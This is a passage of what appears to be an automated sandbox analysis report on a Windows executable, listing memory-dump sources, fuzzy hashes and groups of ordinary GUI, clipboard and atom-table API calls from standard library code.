                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e560bd1caec59af6d500efb963ed5fc40873681b0ebc8681759fa4af4d532582
                                      • Instruction ID: 851f9eee3e01320b4288ad3f19c91922d3f33e54bcf528d402137444d04a0eee
                                      • Opcode Fuzzy Hash: e560bd1caec59af6d500efb963ed5fc40873681b0ebc8681759fa4af4d532582
                                      • Instruction Fuzzy Hash: 39C1B674A04129DFCB18CF29D990AEDBBB2BF89304F5482DAD44DA7345D7349A91CF84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1326dbfe937a3d52607a40f3223747c6343d9964fca09c179b077a83c12a3909
                                      • Instruction ID: bc2db7187c427a76b8ab62e3ea554765f84cf069239f3f8b23c43390bb69995f
                                      • Opcode Fuzzy Hash: 1326dbfe937a3d52607a40f3223747c6343d9964fca09c179b077a83c12a3909
                                      • Instruction Fuzzy Hash: A0C1B674A04229DBCB19CF29D990AEDBBB1BF88304F5481DAD84DA7345D734AA81CF48
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d28601e97a7366d3c4e9cdd0175e350a10ebb45b43f3f05574ef68178ebad36
                                      • Instruction ID: 8decf331596c51c175b0e078763d02ecb03c7d88d170dade55c1e1d7d67e8e98
                                      • Opcode Fuzzy Hash: 3d28601e97a7366d3c4e9cdd0175e350a10ebb45b43f3f05574ef68178ebad36
                                      • Instruction Fuzzy Hash: 88B1C474A04229CFCB58CF29D890AEDBBB2BF88305F5482E9D44DA7345D734AA81CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ca49d15793440a6ac7f647823fe6feca71106282b6619b30b4752bfb79efa4ab
                                      • Instruction ID: 3adbb1fa125a820f2e50b802067d28d3303e3427a5e264c59da25ce0a8c7dbd3
                                      • Opcode Fuzzy Hash: ca49d15793440a6ac7f647823fe6feca71106282b6619b30b4752bfb79efa4ab
                                      • Instruction Fuzzy Hash: 2FB19374A081298FCB58CF69D994AEDBBF2AF88304F9482D9D44DA7345D734AE81CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4ff7f7632a3d7463b3c42bda7d453b67425c52ac1cad7b5b975fe67536b850dc
                                      • Instruction ID: b6745542e3b72dc6fa85fdce590e681673158f25692b35a167deaa880b2b1764
                                      • Opcode Fuzzy Hash: 4ff7f7632a3d7463b3c42bda7d453b67425c52ac1cad7b5b975fe67536b850dc
                                      • Instruction Fuzzy Hash: E0A19574A082298FDB58CF28D994AEABBF1FF88304F9482D9D54DA7345D7349A81CF44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 749def59540ea8172b0c03d07183d7e68b522f821a4efd5fb73b1de9d0969a1e
                                      • Instruction ID: ec5f160aa7d3ff319a5d9b1e4398db9f83ccbe75ed93f38eb7494662ccf87ff1
                                      • Opcode Fuzzy Hash: 749def59540ea8172b0c03d07183d7e68b522f821a4efd5fb73b1de9d0969a1e
                                      • Instruction Fuzzy Hash: D511D7B6D00208EFCB14DF94D9819AEB7B5BF48301F1445AAD805A7342E734AF49CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 82428a06129f0725db19307c150047b4c39713eb8a06e81b1d8ae44c8b984a54
                                      • Instruction ID: 4e66783db4aab46e1a67f9a6e7790c03a1e7b81099787a59bb9d8eee4baffeb4
                                      • Opcode Fuzzy Hash: 82428a06129f0725db19307c150047b4c39713eb8a06e81b1d8ae44c8b984a54
                                      • Instruction Fuzzy Hash: D01116B6D00208EFCB14DF94D8819AEB3B5BF48301F6445AAD815A7342E734AF48CF96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 34f07fc11ea3be595edf0570006f9ed60ff909c28cad2b300e1ed09bc833a650
                                      • Instruction ID: 77d9a9fb65cb97d3c038e7a52c9602304c00cae3818c77ba78c371bfac5425de
                                      • Opcode Fuzzy Hash: 34f07fc11ea3be595edf0570006f9ed60ff909c28cad2b300e1ed09bc833a650
                                      • Instruction Fuzzy Hash: 79B00239661540CFCA55CF08C194E00F3F4FB58760B068491EC05CB722C234ED40CA40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d794bf1f07835c3b10fea10e438be3f5a82aefe50a0e308fa37c15277350eef3
                                      • Instruction ID: 08eb0ad0d3f855e474f3ff173f69043067d91ea7c285dfdd00ec0894cc9890fd
                                      • Opcode Fuzzy Hash: d794bf1f07835c3b10fea10e438be3f5a82aefe50a0e308fa37c15277350eef3
                                      • Instruction Fuzzy Hash: ABB00279661550CFCA51CB08C294E10F3F4FB48770B068591EC09CB722C234ED40CA01
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb1dcb45eca10bbd415de50d8dac458e7e42156cf4c282332bc7bc400f2a61b4
                                      • Instruction ID: 09a661d3bcde169e3a68bda8983e2d082d1c510c2daa6ab026a58b72df35bac7
                                      • Opcode Fuzzy Hash: fb1dcb45eca10bbd415de50d8dac458e7e42156cf4c282332bc7bc400f2a61b4
                                      • Instruction Fuzzy Hash: 3AA00235692980CFCE16CF08C290F0073B4F754B40F010490E401C7A21C228ED40C940
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindowLongA.USER32 ref: 00442104
                                      • GetParent.USER32(?), ref: 0044211D
                                      • SetBkMode.GDI32(?,00000002), ref: 0044212D
                                      • GetClientRect.USER32 ref: 0044213F
                                      • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00442167
                                      • SelectObject.GDI32(?,00000000), ref: 00442177
                                        • Part of subcall function 00441DB0: InflateRect.USER32(?,000000FF,000000FF), ref: 00441DF2
                                        • Part of subcall function 00441DB0: IsWindowEnabled.USER32(?), ref: 00441E05
                                        • Part of subcall function 00441DB0: InflateRect.USER32(?,000000FF,000000FF), ref: 00441E2C
                                        • Part of subcall function 00441DB0: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E43
                                        • Part of subcall function 00441DB0: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E5C
                                        • Part of subcall function 00441DB0: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E74
                                        • Part of subcall function 00441DB0: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E8E
                                        • Part of subcall function 00441DB0: SelectObject.GDI32(?,00000000), ref: 00441EB3
                                      • GetSysColor.USER32(0000000F), ref: 00442189
                                      • SetBkColor.GDI32(?,00000000), ref: 0044218D
                                      • GetSysColor.USER32(00000012), ref: 00442195
                                      • SetTextColor.GDI32(?,00000000), ref: 00442199
                                      • SendMessageA.USER32(?,00000135,?,?), ref: 004421AB
                                      • SelectObject.GDI32(?,00000000), ref: 004421B3
                                      • IntersectClipRect.GDI32(?,?,?,?,?), ref: 004421D8
                                      • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00442210
                                      • IsWindowEnabled.USER32(?), ref: 00442217
                                      • SendMessageA.USER32(?,000000F2,00000000,00000000), ref: 0044222B
                                      • GetWindowTextA.USER32 ref: 00442299
                                      • SelectObject.GDI32(?,?), ref: 004425EF
                                      • SelectObject.GDI32(?,00000000), ref: 00442602
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: ObjectSelect$ColorRectWindow$MessageSend$EnabledInflateText$ClientClipIntersectLongModeParent
                                      • String ID:
                                      • API String ID: 2549663215-0
                                      • Opcode ID: 1682405747360eabe9c31218b8c019574581da7f0eca5db70f202929f512fefe
                                      • Instruction ID: bdf2ffbef5f0773818fe3746d8b2bc19e29757fe273e2a6d1cfff4775e6ae4eb
                                      • Opcode Fuzzy Hash: 1682405747360eabe9c31218b8c019574581da7f0eca5db70f202929f512fefe
                                      • Instruction Fuzzy Hash: 05F149B1108301AFE310DF64CD85B6BB7F8FB89705F40492EF68582291D7B9E945CB6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindowLongA.USER32 ref: 0044292E
                                      • SendMessageA.USER32(?,00000157,00000000,00000000), ref: 0044295A
                                      • HideCaret.USER32(?), ref: 00442970
                                      • GetWindowRect.USER32 ref: 0044297C
                                      • GetParent.USER32(?), ref: 00442983
                                      • ScreenToClient.USER32 ref: 00442997
                                      • ScreenToClient.USER32 ref: 004429A3
                                      • GetDC.USER32(00000000), ref: 004429A6
                                      • GetWindowLongA.USER32 ref: 004429D8
                                      • SendMessageA.USER32(00000000,00001944,00000000,0000029A), ref: 00442A05
                                      • SendMessageA.USER32(00000000,00001943,00000000,0000029A), ref: 00442A26
                                      • GetClassNameA.USER32(00000000,?,00000010), ref: 00442A38
                                      • lstrcmpA.KERNEL32(?,ComboBox), ref: 00442A48
                                      • GetParent.USER32(00000000), ref: 00442A6C
                                      • MapWindowPoints.USER32 ref: 00442A83
                                      • ReleaseDC.USER32 ref: 00442A8B
                                      • GetDC.USER32(?), ref: 00442A96
                                      • GetWindowLongA.USER32 ref: 00442AAC
                                      • GetWindow.USER32(00000000,00000005), ref: 00442AC7
                                      • GetWindowRect.USER32 ref: 00442AD3
                                      • SendMessageA.USER32(00000000,00000157,00000000,00000000), ref: 00442B10
                                      • ReleaseDC.USER32 ref: 00442B20
                                      • ShowCaret.USER32(?), ref: 00442B27
                                      • GetSystemMetrics.USER32 ref: 00442B68
                                      • GetSystemMetrics.USER32 ref: 00442BC7
                                      • GetSystemMetrics.USER32 ref: 00442C18
                                      • ReleaseDC.USER32 ref: 00442C3A
                                      • ShowCaret.USER32(?), ref: 00442C48
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Window$MessageSend$CaretLongMetricsReleaseSystem$ClientParentRectScreenShow$ClassHideNamePointslstrcmp
                                      • String ID: ComboBox
                                      • API String ID: 930961256-1152790111
                                      • Opcode ID: 073be63b8b0cb3fd6d20c407da055cb527acd97b1a9206dde0f1db87d5088ea9
                                      • Instruction ID: c8bd1cc7c7a01407a8b7df43501762d8674bb1d9ccfdae8663ddd83282f04778
                                      • Opcode Fuzzy Hash: 073be63b8b0cb3fd6d20c407da055cb527acd97b1a9206dde0f1db87d5088ea9
                                      • Instruction Fuzzy Hash: CE919371508301AFE3109F64CD89F6F77E8FB85719F40092EF641962A2D7B8E905CB6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • EnterCriticalSection.KERNEL32(00472D20,?,?,?,?,?,?,?,?,?,?,?,?,004405A7), ref: 0044103B
                                      • GetDC.USER32(00000000), ref: 00441043
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00441054
                                      • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0044105B
                                      • GetSystemMetrics.USER32 ref: 00441079
                                      • GetSystemMetrics.USER32 ref: 00441084
                                      • ReleaseDC.USER32 ref: 0044109A
                                      • GlobalAddAtomA.KERNEL32 ref: 004410B4
                                      • LeaveCriticalSection.KERNEL32(00472D20,?,?,?,?,?,?,?,?,?,?,?,?,004405A7), ref: 004410D0
                                      • GlobalAddAtomA.KERNEL32 ref: 004410E7
                                      • GlobalAddAtomA.KERNEL32 ref: 004410F9
                                      • GlobalAddAtomA.KERNEL32 ref: 00441106
                                      • GlobalAddAtomA.KERNEL32 ref: 0044112A
                                      • GlobalAddAtomA.KERNEL32 ref: 00441137
                                      • GlobalAddAtomA.KERNEL32 ref: 0044115B
                                      • GetSystemMetrics.USER32 ref: 0044116E
                                      • GetClassInfoA.USER32 ref: 004411B1
                                      • GetClassInfoA.USER32 ref: 004411CE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: AtomGlobal$MetricsSystem$CapsClassCriticalDeviceInfoSection$EnterLeaveRelease
                                      • String ID: @&D$C3d$C3dD$C3dH$C3dHNew$C3dL$C3dLNew$C3dNew
                                      • API String ID: 1233821986-4162291837
                                      • Opcode ID: 29aaeae25fafa6a0cf007edfdcb9944ec14c6b167c66b79c237adafe1946ce69
                                      • Instruction ID: c770671f82e62e801a4ddea266b5f2ac1eab46a0130f1946002667b2ebdf3cb3
                                      • Opcode Fuzzy Hash: 29aaeae25fafa6a0cf007edfdcb9944ec14c6b167c66b79c237adafe1946ce69
                                      • Instruction Fuzzy Hash: B741C7746403809BF734AB64ED41B6637E4EB44352F100037ED48976B1EBF898C58BAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegisterClipboardFormatA.USER32 ref: 0044D8CA
                                      • RegisterClipboardFormatA.USER32 ref: 0044D8D3
                                      • RegisterClipboardFormatA.USER32 ref: 0044D8DD
                                      • RegisterClipboardFormatA.USER32 ref: 0044D8E7
                                      • RegisterClipboardFormatA.USER32 ref: 0044D8F1
                                      • RegisterClipboardFormatA.USER32 ref: 0044D8FB
                                      • RegisterClipboardFormatA.USER32 ref: 0044D905
                                      • RegisterClipboardFormatA.USER32 ref: 0044D90F
                                      • RegisterClipboardFormatA.USER32 ref: 0044D919
                                      • RegisterClipboardFormatA.USER32 ref: 0044D923
                                      • RegisterClipboardFormatA.USER32 ref: 0044D92D
                                      • RegisterClipboardFormatA.USER32 ref: 0044D937
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: ClipboardFormatRegister
                                      • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                      • API String ID: 1228543026-2889995556
                                      • Opcode ID: 1d48c113961a9791580dc5368ea021b3a1b633a4b72cc2bd17d84cd11451c38c
                                      • Instruction ID: 3809d7f04c7150e7ce7feeda2d699c90ec93e99e1a5d6bea04fd8635611c4a72
                                      • Opcode Fuzzy Hash: 1d48c113961a9791580dc5368ea021b3a1b633a4b72cc2bd17d84cd11451c38c
                                      • Instruction Fuzzy Hash: 91016770E407449A8770BF769C0991BBEE4EEC4B113224D2FE09697651E6B8E401CF9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 004402C0: SetBkColor.GDI32(?), ref: 004402DD
                                        • Part of subcall function 004402C0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0044032A
                                        • Part of subcall function 004402C0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00440359
                                        • Part of subcall function 004402C0: SetBkColor.GDI32(?,?), ref: 00440377
                                        • Part of subcall function 004402C0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004403A2
                                        • Part of subcall function 004402C0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 004403DC
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00441DF2
                                      • IsWindowEnabled.USER32(?), ref: 00441E05
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00441E2C
                                      • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E43
                                      • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E5C
                                      • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E74
                                      • PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 00441E8E
                                      • SelectObject.GDI32(?,00000000), ref: 00441EB3
                                      • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00441ED7
                                      • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00441EF7
                                      • SelectObject.GDI32(?,00000000), ref: 00441F0D
                                      • PatBlt.GDI32(?,00000000,?,?,00000001,00F00021), ref: 00441F3B
                                      • PatBlt.GDI32(?,00000000,00000000,00000001,00000000,00F00021), ref: 00441F5C
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00441F72
                                      • SelectObject.GDI32(?,00000000), ref: 00441F8C
                                      • PatBlt.GDI32(?,00000000,?,?,?,00F00021), ref: 00441FB4
                                      • IsWindowEnabled.USER32(?), ref: 00441FBF
                                      • SetTextColor.GDI32(?,00000000), ref: 00441FD0
                                      • OffsetRect.USER32(?,00000001,00000001), ref: 0044205C
                                        • Part of subcall function 004402C0: SetBkColor.GDI32(?,00000000), ref: 004403E4
                                      • DrawTextA.USER32(?,?,?,?,00000020), ref: 00442094
                                      • GetFocus.USER32 ref: 004420A0
                                      • InflateRect.USER32(?,00000001,00000001), ref: 004420B1
                                      • IntersectRect.USER32 ref: 004420C2
                                      • DrawFocusRect.USER32 ref: 004420CE
                                      • SelectObject.GDI32(?,00000000), ref: 004420E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Rect$Text$ColorInflateObjectSelect$DrawEnabledFocusWindow$IntersectOffset
                                      • String ID:
                                      • API String ID: 1611134597-0
                                      • Opcode ID: a0e022ac2215dfe1e6f67c2e19e6dd38c976a66c205807bc0037a9a5d0d594a4
                                      • Instruction ID: 2b84b2e39c11879530764e33173bd792e12d93c94560161379a564abe2c3b581
                                      • Opcode Fuzzy Hash: a0e022ac2215dfe1e6f67c2e19e6dd38c976a66c205807bc0037a9a5d0d594a4
                                      • Instruction Fuzzy Hash: 70B13B71208301AFE300CF68DD85E6BB7E8FB88715F004A1DF659D22A1C7B5E985CB56
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetPropA.USER32 ref: 00442685
                                      • CallWindowProcA.USER32 ref: 004426AD
                                        • Part of subcall function 004401E0: CallWindowProcA.USER32 ref: 00440206
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044021E
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044022A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
